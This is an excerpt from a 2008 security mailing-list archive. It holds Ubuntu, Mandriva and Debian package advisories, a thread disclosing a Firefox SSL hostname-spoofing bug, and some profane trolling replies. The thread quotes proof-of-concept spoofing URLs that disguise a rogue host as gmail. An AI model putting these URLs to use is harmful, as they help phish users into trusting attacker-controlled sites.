http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.1_i386.deb Size/MD5: 435354 f3557e1a87154424e9144cf672110e93 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.1_i386.deb Size/MD5: 439062 3469e523d93cfc20b71271b1f24daea1 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.1_i386.deb Size/MD5: 410026 fafeb6f9433f595e1a634505f78d2bd1 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.1_i386.deb Size/MD5: 410606 29b01db3883e5d12a5992c22cadfbe7a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.1_i386.deb Size/MD5: 346490 6581362eebd73d91d1f74ebd9941c890 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.1_i386.deb Size/MD5: 944816 a1f598ad168bf49f12f8b0cf08ab7908 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.1_powerpc.deb Size/MD5: 458126 f08b8b1f2673fdfcbd849bc913006408 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.1_powerpc.deb Size/MD5: 453546 f52c55b92d5b1c42cb4cfcfee774b1bd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.1_powerpc.deb Size/MD5: 457466 f7b948be666100a7f5631cbafe2255dd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.1_powerpc.deb Size/MD5: 410024 3bba352e3a2d8730a23d04fdcea5abd9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.1_powerpc.deb Size/MD5: 410606 b95af66f260d1291e92986790b7d2f0f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.1_powerpc.deb Size/MD5: 366550 c2f8906ce78396a240e37c08aa2cc197 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.1_powerpc.deb Size/MD5: 1091688 f214016a736f7743a28dfd03e09753e2 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.1_sparc.deb Size/MD5: 440954 f1a98acdf576d3e7c9576501f7886d30 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.1_sparc.deb Size/MD5: 437166 36b4878e0e9593b5d28c743eb093784a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.1_sparc.deb Size/MD5: 440446 46d56f1a8d1b10cc937c8252648a583e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.1_sparc.deb Size/MD5: 410028 0c28e9654530a4ecf363d998b78e1fd5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.1_sparc.deb Size/MD5: 410608 8e22b403b2315b190263f8ba2c8f98dd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.1_sparc.deb Size/MD5: 349678 fe7ce515de30be0ef1ddf865cae5dd49 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.1_sparc.deb Size/MD5: 956316 009e48ea5e94d39830b3e9ba21aa55c8 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080204/9ec0758e/attachment.bin From Larry at larryseltzer.com Mon Feb 4 23:49:59 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Mon, 4 Feb 2008 18:49:59 -0500 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: <47A77744.9020709@nbnet.nb.ca> References: <47A77744.9020709@nbnet.nb.ca> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252CC0@becca.LarrySeltzer.local> I get this same warning on FF 3.0 beta 2 on Vista. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of steve menard Sent: Monday, February 04, 2008 3:36 PM To: full-disclosure at lists.grok.org.uk Cc: carl hardwick Subject: Re: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities I get a warning on 2.0.0.11 Linux Ubuntu You are about to log into the site "google" with the username "www%2Ecnn at 2Ecom%c0%AF%C0%AF%C0%C0%80", but the website does not require authentication. this may be an attempt to trick you Is "google" the site you want to visit.? is this a 2.0.0.12 issue? Steve carl hardwick wrote: > Firefox seems to have trouble with defining the proper hostname when > requesting a ssl connection. I was able to trick Firefox in thinking > the hostname behind the at-sign is legit and the same as the URI that > requested an ssl connection, and this without a warning. > > PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com > > You can add as much garbage between .com and the @ sign. > > So what else can we do? > > PoC: > www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google > www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail > > ah heck we don't need that at all: > www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx at hot > mail > > works fine also :) > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From my.security.lists at gmail.com Tue Feb 5 04:08:07 2008 From: my.security.lists at gmail.com (Rob Thompson) Date: Mon, 04 Feb 2008 20:08:07 -0800 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: <649944.3191202167107189.JavaMail.juha-matti.laurio@netti.fi> References: <649944.3191202167107189.JavaMail.juha-matti.laurio@netti.fi> Message-ID: <47A7E127.1020309@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Juha-Matti Laurio wrote: | The most recent Firefox 2.0.0.12 version is RC4 still: | http://www.mozilla.com/en-US/firefox/2.0.0.12/releasenotes/ | | You can't download Firefox 2.0.12 Final yet. So if that's the case, did the author of this thread report this to the FF team? /me doesn't see the point of sending this type of e-mail out to a list. ~ Since this is a Release Candidate - not even released. Just report it to the authors and let them fix it for the final. Thanks Juha-Matti Laurio, for the clarification. | | Juha-Matti | | carl hardwick wrote: |> Firefox seems to have trouble with defining the proper hostname when |> requesting a ssl connection. I was able to trick Firefox in thinking |> the hostname behind the at-sign is legit and the same as the URI that |> requested an ssl connection, and this without a warning. |> |> PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com |> |> You can add as much garbage between .com and the @ sign. |> |> So what else can we do? |> |> PoC: |> www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google |> www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail |> |> ah heck we don't need that at all: |> www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx at hotmail |> |> works fine also :) |> | | _______________________________________________ | Full-Disclosure - We believe in it. | Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ | - -- Rob +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ | _ | | ASCII ribbon campaign ( ) | | - against HTML email X | | / \ | | | +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) iEYEARECAAYFAken4SYACgkQcfN68iZZIcfP1gCcChRWeu4nH+cbSJJ69I4AH7eI DYkAoKRkc6PE6WEqdFIN53kMYYPOhu+H =ZMTM -----END PGP SIGNATURE----- From joey.mengele at hushmail.com Tue Feb 5 04:18:15 2008 From: joey.mengele at hushmail.com (Joey Mengele) Date: Mon, 04 Feb 2008 23:18:15 -0500 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities Message-ID: <20080205041815.99A58D005F@mailserver10.hushmail.com> Confirmed on emacs on freebsd running on an alpha. J On Mon, 04 Feb 2008 18:49:59 -0500 Larry Seltzer wrote: >I get this same warning on FF 3.0 beta 2 on Vista. > >Larry Seltzer >eWEEK.com Security Center Editor >http://security.eweek.com/ >http://blogs.pcmag.com/securitywatch/ >Contributing Editor, PC Magazine >larry.seltzer at ziffdavisenterprise.com > > >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk >[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of >steve >menard >Sent: Monday, February 04, 2008 3:36 PM >To: full-disclosure at lists.grok.org.uk >Cc: carl hardwick >Subject: Re: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and >Domain >Guessing vulnerabilities > >I get a warning on 2.0.0.11 Linux Ubuntu > >You are about to log into the site "google" with the username >"www%2Ecnn at 2Ecom%c0%AF%C0%AF%C0%C0%80", but the website does not >require >authentication. this may be an attempt to trick you Is "google" >the site >you want to visit.? > >is this a 2.0.0.12 issue? >Steve > >carl hardwick wrote: >> Firefox seems to have trouble with defining the proper hostname >when >> requesting a ssl connection. I was able to trick Firefox in >thinking >> the hostname behind the at-sign is legit and the same as the URI >that >> requested an ssl connection, and this without a warning. >> >> PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com >> >> You can add as much garbage between .com and the @ sign. >> >> So what else can we do? >> >> PoC: >> www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google >> www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail >> >> ah heck we don't need that at all: >> >www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx@ >hot >> mail >> >> works fine also :) >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html -- Click to shop and save on brand name copiers today. http://tagline.hushmail.com/fc/Ioyw6h4efL2XHRwVibUkjF3PhLMcf2jUicxXpiVPZLGbWnRIZ6Onn6/ >Hosted and sponsored by Secunia - http://secunia.com/ From joey.mengele at hushmail.com Tue Feb 5 04:19:14 2008 From: joey.mengele at hushmail.com (Joey Mengele) Date: Mon, 04 Feb 2008 23:19:14 -0500 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness Message-ID: <20080205041914.50BB4D005F@mailserver10.hushmail.com> LOLOLOLOLOL GLORYHOLES On Mon, 04 Feb 2008 11:42:13 -0500 Derek Buelna wrote: >It's been hard to fill all those positions in Oregon since we have >manned gas stations. > >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk >[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of >North, >Quinn >Sent: Monday, February 04, 2008 7:33 AM >To: coderman; Adam Chesnutt >Cc: full-disclosure at lists.grok.org.uk >Subject: Re: [Full-disclosure] Southwest Airlines Ticket Silliness > >I thought TSA stood for Thousands Standing Around. > >Yet another super informative TLA (Three Letter Acronym). > >--=Q=-- > > >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk >[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of >coderman >Sent: Friday, February 01, 2008 4:37 AM >To: Adam Chesnutt >Cc: full-disclosure at lists.grok.org.uk >Subject: Re: [Full-disclosure] Southwest Airlines Ticket Silliness > >HELLO INDIAN > >On Jan 31, 2008 6:38 PM, Adam Chesnutt >wrote: >> Not sure if anyone posted this before; But I figured this would >interest >> you guys... > >TSA == FULL IF FUCKING IGNORANT FUCKS > >so this is a kinown vulnerability. > >what was the question agtain? > >coderman, pwnder by nbusmillls whiskey > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > >This email is intended for the recipient only. If you are not the >intended recipient please disregard, and do not use the >information for >any purpose. > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html -- Click here for free information on nursing degrees, up to $150/hour http://tagline.hushmail.com/fc/Ioyw6h4eKEAdeYYvLr6qK2Ce5XLbfZbgEeeLOlH9GGTcipK1N9xgzW/ >Hosted and sponsored by Secunia - http://secunia.com/ From redhowlingwolves at nc.rr.com Tue Feb 5 03:34:33 2008 From: redhowlingwolves at nc.rr.com (scott) Date: Mon, 04 Feb 2008 22:34:33 -0500 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: <47A77744.9020709@nbnet.nb.ca> References: <47A77744.9020709@nbnet.nb.ca> Message-ID: <47A7D949.5060305@nc.rr.com> This is obviously a bug in the newest beta release and should be reported there.Why the OP chose not to do this is a matter for speculation. Regards, Scott steve menard wrote: > I get a warning on 2.0.0.11 Linux Ubuntu > > You are about to log into the site "google" with the username > "www%2Ecnn at 2Ecom%c0%AF%C0%AF%C0%C0%80", but the website does not require > authentication. this may be an attempt to trick you > Is "google" the site you want to visit.? > > is this a 2.0.0.12 issue? > Steve > > carl hardwick wrote: > >> Firefox seems to have trouble with defining the proper hostname when >> requesting a ssl connection. I was able to trick Firefox in thinking >> the hostname behind the at-sign is legit and the same as the URI that >> requested an ssl connection, and this without a warning. >> >> PoC: https://www.gmail.com%C0%AF%C0%AF%C0%C0%80 at roguehost.com >> >> You can add as much garbage between .com and the @ sign. >> >> So what else can we do? >> >> PoC: >> www.cnn.com%C0%AF%C0%AF%C0%C0%80 at google >> www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail >> >> ah heck we don't need that at all: >> www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx at hotmail >> >> works fine also :) >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 252 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080204/7120c064/attachment.bin From security at mandriva.com Tue Feb 5 05:49:02 2008 From: security at mandriva.com (security at mandriva.com) Date: Mon, 04 Feb 2008 22:49:02 -0700 Subject: [Full-disclosure] [ MDVSA-2008:034 ] - Updated emacs packages fix vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:034 http://www.mandriva.com/security/ _______________________________________________________________________ Package : emacs Date : February 4, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: The hack-local-variable function in Emacs 22 prior to version 22.2, when enable-local-variables is set to ':safe', did not properly search lists of unsafe or risky variables, which could allow user-assisted attackers to bypass intended restrictions and modify critical program variables via a file containing a Local variables declaration (CVE-2007-5795; only affects Mandriva Linux 2008.0). A stack-based buffer overflow in emacs could allow user-assisted attackers to cause an application crash or possibly have other unspecified impacts via a large precision value in an integer format string specifier to the format function (CVE-2007-6109). The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5795 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6109 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: f21e7e74502d46bc080f4a48080c574a 2007.0/i586/emacs-21.4-26.2mdv2007.0.i586.rpm a73d62aee609e6be32937b681780a0b6 2007.0/i586/emacs-X11-21.4-26.2mdv2007.0.i586.rpm 589a15364fb4cfbf12e8e47b7104a7fa 2007.0/i586/emacs-doc-21.4-26.2mdv2007.0.i586.rpm 2253dd2b8b5aa563add08e7350a65f44 2007.0/i586/emacs-el-21.4-26.2mdv2007.0.i586.rpm 919175eea98794b2a4ea7b3626119a8a 2007.0/i586/emacs-leim-21.4-26.2mdv2007.0.i586.rpm a8c1c605bd854db7637b8318f7b5c7f5 2007.0/i586/emacs-nox-21.4-26.2mdv2007.0.i586.rpm 58b7e26033084006cda510468ebc75ac 2007.0/SRPMS/emacs-21.4-26.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: a6ff38fc50ebb49e211bc5cf10231e01 2007.0/x86_64/emacs-21.4-26.2mdv2007.0.x86_64.rpm d8bc4c5f8663c2c4e3fef168db4f16b9 2007.0/x86_64/emacs-X11-21.4-26.2mdv2007.0.x86_64.rpm c5c6dd9d95905c838ca6d731f208f67e 2007.0/x86_64/emacs-doc-21.4-26.2mdv2007.0.x86_64.rpm a5ae4708158e52a3de4bdeb3e3c203fc 2007.0/x86_64/emacs-el-21.4-26.2mdv2007.0.x86_64.rpm 0ef28ab5726ae394499645062c633602 2007.0/x86_64/emacs-leim-21.4-26.2mdv2007.0.x86_64.rpm e90514c50fd5cef37dc59a27b705d13c 2007.0/x86_64/emacs-nox-21.4-26.2mdv2007.0.x86_64.rpm 58b7e26033084006cda510468ebc75ac 2007.0/SRPMS/emacs-21.4-26.2mdv2007.0.src.rpm Mandriva Linux 2007.1: bacb82a95ab9babc66aa7a46e6b4dc82 2007.1/i586/emacs-21.4-26.2mdv2007.1.i586.rpm 954785ebcf994cea467008606ceb7865 2007.1/i586/emacs-X11-21.4-26.2mdv2007.1.i586.rpm 77e9d3072e695b29d07ebac0f40fd262 2007.1/i586/emacs-doc-21.4-26.2mdv2007.1.i586.rpm 880b385fea1eb26b5bac57427c86ba08 2007.1/i586/emacs-el-21.4-26.2mdv2007.1.i586.rpm 4f2e9e2a7a5099f4de32c53822cf736a 2007.1/i586/emacs-leim-21.4-26.2mdv2007.1.i586.rpm bb2fce94cb107de86bff7b0727be023c 2007.1/i586/emacs-nox-21.4-26.2mdv2007.1.i586.rpm 93460555120ee14779b4090ab77425a4 2007.1/SRPMS/emacs-21.4-26.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 8285245a590680e2cee5520e4a627703 2007.1/x86_64/emacs-21.4-26.2mdv2007.1.x86_64.rpm bc97da27f378af323630a2f318c24155 2007.1/x86_64/emacs-X11-21.4-26.2mdv2007.1.x86_64.rpm 306c2ea8ecc96094195ed970e6648245 2007.1/x86_64/emacs-doc-21.4-26.2mdv2007.1.x86_64.rpm 4dddafd86ec989b8329062c44a909a9c 2007.1/x86_64/emacs-el-21.4-26.2mdv2007.1.x86_64.rpm 024fed6e709952488ef2d6ed0397de9d 2007.1/x86_64/emacs-leim-21.4-26.2mdv2007.1.x86_64.rpm c096d01ea9be0779f46d8a1474d5318f 2007.1/x86_64/emacs-nox-21.4-26.2mdv2007.1.x86_64.rpm 93460555120ee14779b4090ab77425a4 2007.1/SRPMS/emacs-21.4-26.2mdv2007.1.src.rpm Mandriva Linux 2008.0: e6dd6abf0cb27d303b22e80d1091bd1e 2008.0/i586/emacs-22.1-5.1mdv2008.0.i586.rpm 4dfa152d8998fc5c8fe78e3cbaf125f6 2008.0/i586/emacs-common-22.1-5.1mdv2008.0.i586.rpm ff9cc6e64a7142198b49f551944f7357 2008.0/i586/emacs-doc-22.1-5.1mdv2008.0.i586.rpm 25af5a88aacdbaa419a67d4adf125589 2008.0/i586/emacs-el-22.1-5.1mdv2008.0.i586.rpm dd847a0b9e3eb8cd59d69dc365320ff1 2008.0/i586/emacs-gtk-22.1-5.1mdv2008.0.i586.rpm 3592f389b333475fa94cb4dc84cde8be 2008.0/i586/emacs-leim-22.1-5.1mdv2008.0.i586.rpm 0fb982382245c7858def3f788820cdac 2008.0/i586/emacs-nox-22.1-5.1mdv2008.0.i586.rpm fc5ae7001cfd746c5eedcb7172a0445c 2008.0/SRPMS/emacs-22.1-5.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 551b608acfd97bd227f3d3c8b5b6f155 2008.0/x86_64/emacs-22.1-5.1mdv2008.0.x86_64.rpm 88e56aabb7dd52cdc9fd813ecc376c12 2008.0/x86_64/emacs-common-22.1-5.1mdv2008.0.x86_64.rpm 6f1a0ffb0600cf3e076257f0972793a9 2008.0/x86_64/emacs-doc-22.1-5.1mdv2008.0.x86_64.rpm f6a8a3d45feb6d04e66fc5ffd4eb2067 2008.0/x86_64/emacs-el-22.1-5.1mdv2008.0.x86_64.rpm 0377fec7fb8f09dfd84db6fa6de6ff0a 2008.0/x86_64/emacs-gtk-22.1-5.1mdv2008.0.x86_64.rpm f914847423ed5c5fa217f77c19d0b312 2008.0/x86_64/emacs-leim-22.1-5.1mdv2008.0.x86_64.rpm f834fbcb86b540946dbbb7fd68ef97d8 2008.0/x86_64/emacs-nox-22.1-5.1mdv2008.0.x86_64.rpm fc5ae7001cfd746c5eedcb7172a0445c 2008.0/SRPMS/emacs-22.1-5.1mdv2008.0.src.rpm Corporate 3.0: 846bc555f6e24843329bc971a0d86e7d corporate/3.0/i586/emacs-21.3-9.3.C30mdk.i586.rpm e5f5a7c2885801f69284d2cf83cc7657 corporate/3.0/i586/emacs-X11-21.3-9.3.C30mdk.i586.rpm fbd6b3dcdbe55b8f6a238c6c28c819ac corporate/3.0/i586/emacs-el-21.3-9.3.C30mdk.i586.rpm 920d56462f970bd5228a3a9729ec149c corporate/3.0/i586/emacs-leim-21.3-9.3.C30mdk.i586.rpm 9a762f39fda7e8af966f2d8580ff561d corporate/3.0/i586/emacs-nox-21.3-9.3.C30mdk.i586.rpm adc16c5f9ad32295db6ea036101069e2 corporate/3.0/SRPMS/emacs-21.3-9.3.C30mdk.src.rpm Corporate 3.0/X86_64: 91a59e872e88638df84b32cd7cdb7fe4 corporate/3.0/x86_64/emacs-21.3-9.3.C30mdk.x86_64.rpm a4ccc81d17b1397d5fdec6eb6e2ddad9 corporate/3.0/x86_64/emacs-X11-21.3-9.3.C30mdk.x86_64.rpm 4f08fc2400cc2ef9ed3d2970f3324ffe corporate/3.0/x86_64/emacs-el-21.3-9.3.C30mdk.x86_64.rpm d77294d54d8908cf3016cd7f1cafe1ea corporate/3.0/x86_64/emacs-leim-21.3-9.3.C30mdk.x86_64.rpm 7eba0bf35e01c4a6e1018a8cb5225115 corporate/3.0/x86_64/emacs-nox-21.3-9.3.C30mdk.x86_64.rpm adc16c5f9ad32295db6ea036101069e2 corporate/3.0/SRPMS/emacs-21.3-9.3.C30mdk.src.rpm Corporate 4.0: ce19613054ce62dd96433b01b91258b1 corporate/4.0/i586/emacs-21.4-20.2.20060mlcs4.i586.rpm b67b18e5f5fccbb9c4012f49f31325f0 corporate/4.0/i586/emacs-X11-21.4-20.2.20060mlcs4.i586.rpm 146214a37b174b2b59d7e883bb29802f corporate/4.0/i586/emacs-doc-21.4-20.2.20060mlcs4.i586.rpm 0bf2f09a9a5a0b02c0f9600e34ba9f84 corporate/4.0/i586/emacs-el-21.4-20.2.20060mlcs4.i586.rpm 92cd0e9c3bfa881f0303810d6e9e8cbf corporate/4.0/i586/emacs-leim-21.4-20.2.20060mlcs4.i586.rpm 7a75213230a1f3a905ee91d588b6cd08 corporate/4.0/i586/emacs-nox-21.4-20.2.20060mlcs4.i586.rpm af9fa010f39b56f24803926854f0595e corporate/4.0/SRPMS/emacs-21.4-20.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 173a3addd59c8706d407be4926712920 corporate/4.0/x86_64/emacs-21.4-20.2.20060mlcs4.x86_64.rpm a445eb2f6c731ac7b11da483d533911a corporate/4.0/x86_64/emacs-X11-21.4-20.2.20060mlcs4.x86_64.rpm 46385585ed5da20703584623f862c8eb corporate/4.0/x86_64/emacs-doc-21.4-20.2.20060mlcs4.x86_64.rpm 32a6678ddee851f69d541cfafa3e101e corporate/4.0/x86_64/emacs-el-21.4-20.2.20060mlcs4.x86_64.rpm 980dce6cf406dac7c3ee1d89073c6d91 corporate/4.0/x86_64/emacs-leim-21.4-20.2.20060mlcs4.x86_64.rpm 5814b72ab37b9bdd8ea2b58de765ebad corporate/4.0/x86_64/emacs-nox-21.4-20.2.20060mlcs4.x86_64.rpm af9fa010f39b56f24803926854f0595e corporate/4.0/SRPMS/emacs-21.4-20.2.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHp8z7mqjQ0CJFipgRAtNtAJ9/AC9geA+QIBE3TM0v+IwziIfOWgCfdVRj RD8hy/qUWC+OatCCbnurL+I= =3oy6 -----END PGP SIGNATURE----- From skx at debian.org Tue Feb 5 17:09:37 2008 From: skx at debian.org (Steve Kemp) Date: Tue, 5 Feb 2008 17:09:37 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1486-1] New gnatsweb packages fix cross-site scripting Message-ID: <20080205170937.GA21588@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1486-1 security at debian.org http://www.debian.org/security/ Steve Kemp February 04, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : gnatsweb Vulnerability : cross-site scripting Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-2808 Debian Bug : 427156 "r0t" discovered that gnatsweb, a web interface to GNU GNATS, did not correctly sanitize the database parameter in the main CGI script. This could allow the injection of arbitrary HTML, or javascript code. For the stable distribution (etch), this problem has been fixed in version 4.00-1etch1. We recommend that you upgrade your gnatsweb package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/g/gnatsweb/gnatsweb_4.00-1etch1.dsc Size/MD5 checksum: 566 2f4db4f88a4018f68c19598e9b3781e1 http://security.debian.org/pool/updates/main/g/gnatsweb/gnatsweb_4.00.orig.tar.gz Size/MD5 checksum: 87656 1d715610ea05ad3aa498d20158b01667 http://security.debian.org/pool/updates/main/g/gnatsweb/gnatsweb_4.00-1etch1.diff.gz Size/MD5 checksum: 2396 82f3180801f111b682a8e94c41c2627c Architecture independent packages: http://security.debian.org/pool/updates/main/g/gnatsweb/gnatsweb_4.00-1etch1_all.deb Size/MD5 checksum: 56190 2decb55d6c8e571474b4375394fc14f0 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHqJgOwM/Gs81MDZ0RAr5PAJ4qyIYx7LWxsBtH/wSd/mY9iffMPwCfSF1K DcDb53eqirDDP0JmknAt73Q= =xmAs -----END PGP SIGNATURE----- From jmm at debian.org Tue Feb 5 17:13:47 2008 From: jmm at debian.org (Moritz Muehlenhoff) Date: Tue, 5 Feb 2008 18:13:47 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1480-1] New poppler packages fix several vulnerabilities Message-ID: <20080205171347.GA4340@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1480-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff February 05, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : poppler Vulnerability : several Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2007-4352 CVE-2007-5392 CVE-2007-5393 Alin Rad Pop discovered several buffer overflows in the Poppler PDF library, which could allow the execution of arbitrary code if a malformed PDF file is opened. For the stable distribution (etch), these problems have been fixed in version 0.4.5-5.1etch2. The old stable distribution (sarge) doesn't contain poppler. We recommend that you 